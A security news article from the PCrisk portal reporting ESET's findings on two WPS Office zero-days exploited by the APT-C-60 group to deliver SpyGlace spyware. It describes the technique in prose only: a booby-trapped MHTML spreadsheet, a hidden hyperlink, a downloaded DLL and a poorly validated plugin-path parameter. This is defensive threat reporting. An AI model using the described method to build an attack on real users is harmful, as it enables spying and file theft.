FacebookTwitterLinkedIn

South Korean APT Group Exploits WPS Office Zero-Day

In recently published research, researchers at security firm ESET discovered a zero-day vulnerability impacting WPS Office for Windows. WPS Office, developed by Chinese firm Kingsoft, is incredibly popular in Asia.

Reportedly, it has over 500 million active users worldwide. ESET researchers discovered two zero-day vulnerabilities that would allow a threat actor to execute malicious code.

South Korean APT Group Exploits WPS Office Zero-Day

The first vulnerability, classified as CVE-2024-7262, was discovered when researchers began investigating suspicious APT-C-60, an advanced persistent threat group operating out of South Korea, when researchers saw the group's known downloader components using the previously undocumented WPS flaw.

The attack culminated in dropping a malware payload that included the SpyGlace spyware package. It was also determined that the malware was delivered to WPS users based in China.

ESET reported the vulnerability following a coordinated vulnerability disclosure policy. Kingsoft silently patched this, prompting ESET to publish details of the flaw to the public. Further investigations by ESET led to the discovery of a second zero-day CVE-2024-7263. ESET researchers believe this vulnerability stemmed from an incomplete patch for CVE-2024-7262.

In providing more details, it was stated that Kingsoft's initial attempt to address the problem added validation on specific parameters. However, some, like the 'CefPluginPathU8,' were still not adequately secured, allowing attackers to point to paths of malicious servers for downloading malware payloads.

As for how the attacks witnessed by researchers were done, it was stated,

The malicious document (SHA-1: 7509B4C506C01627C1A4C396161D07277F044AC6) comes as an MHTML export of the commonly used XLS spreadsheet format. However, it contains a specially crafted and hidden hyperlink designed to trigger the execution of an arbitrary library if clicked when using the WPS Spreadsheet application. The rather unconventional MHTML file format allows a file to be downloaded as soon as the document is opened; therefore, leveraging this technique while exploiting the vulnerability provides for remote code execution. Figure 1 shows how the document is displayed in WPS Spreadsheet: an image of rows and columns referencing the Coremail email solution, used as a decoy. The image hides the malicious hyperlink.

To exploit the vulnerability, researchers noted that a threat actor would need to store a malicious library somewhere accessible by the targeted computer, either on the system or on a remote share, and know its file path in advance.

In this instance, threat actors leverage a specific feature of the supported MHTML file format to have their malicious component downloaded and stored on the victim's system.

This proved to be a reliable way to exploit the flaw mentioned above. The file format was developed to allow users to view Word and Excel documents in the browser. To do this, it contains HTML, CSS, and JavaScript components.

Threat actors add a specific HTML tag that handles displaying images; this is then used to insert a malicious link that downloads malicious files when the document is opened. In this instance, a custom library with a .dll file extension was downloaded and crafted to exploit the WPS vulnerability.

In conclusion, ESET researchers noted that the uncovering of zero-day by APT-C-60 shows just how much it is determined to compromise targets in East Asian countries.

Whether the group developed or bought the exploit for CVE-2024-7262 is a moot point at this stage, as it requires some research into the application's internals and knowledge of how the Windows loading process behaves.

The exploit is cunning, as it is deceptive enough to trick any user into clicking on a legitimate-looking spreadsheet. The attack method is also notable as it is very effective and reliable. Further, the MHTML file format choice allowed the attackers to turn a code execution vulnerability into a remote one.  

SpyGlace

ESET tracks the final malware payload as SpyGlace. However, Threat Book published a detailed analysis of the malware in 2022. Threat Book tracks the malware as TaskControler.dll. The malware itself can easily be classified as spyware and, or a trojan. The malware's core functionality revolves around file stealing, plug-in loading, and shell functions.

Researchers summarized the infection chain as follows,

The payload execution process in the attack is as follows. Starting from the downloaded compressed file, the persistence payload is to be divided into three parts: Lnk file with malicious download, downloader Trojan (mssysmon.db) with file information acquisition and download execution, remote-control Trojan (TaskControler.dll) with file stealing, plug-in loading, and shell function.

SpyGlace, or TaskControler.dll, is a 64-bit .dll component developed by C++. In determining if APT-C-60 were the masterminds behind the malware's delivery, Threat Book notes,

This sample is basically the same as the execution process of the landing payload in the previous APT-C-60 attack. The third-stage component TaskControler.dll is the same as the historical attack with same export function and same code behavior and communication process. The following figure is a screenshot of the historical attack time analysis of the APT-C-60, in which the forgery payload component directory and payload traversal loading logic in the DLL payload export function “extension”, “%AppData%\Roaming\Microsoft\” are exactly the same. Therefore, it is more credible to attribute this attack sample to APT-C-60.

▼ Show Discussion

About the author:

Karolis Liucveikis

Karolis Liucveikis - experienced software engineer, passionate about behavioral analysis of malicious apps.

Author and general operator of PCrisk's "Removal Guides" section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has experience of over five years working in this branch. He attended KTU University and graduated with a degree in Software Development in 2017. Extremely passionate about technical aspects and behavior of various malicious applications. Contact Karolis Liucveikis.

PCrisk security portal is brought by a company RCS LT. Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.

Our malware removal guides are free. However, if you want to support us you can send us a donation.

About PCrisk

PCrisk is a cyber security portal, informing Internet users about the latest digital threats. Our content is provided by security experts and professional malware researchers. Read more about us.

Malware activity

Global malware activity level today:

Medium threat activity

Increased attack rate of infections detected within the last 24 hours.

Virus and malware removal

This page provides information on how to avoid infections by malware or viruses and is useful if your system suffers from common spyware and malware attacks.

Learn about malware removal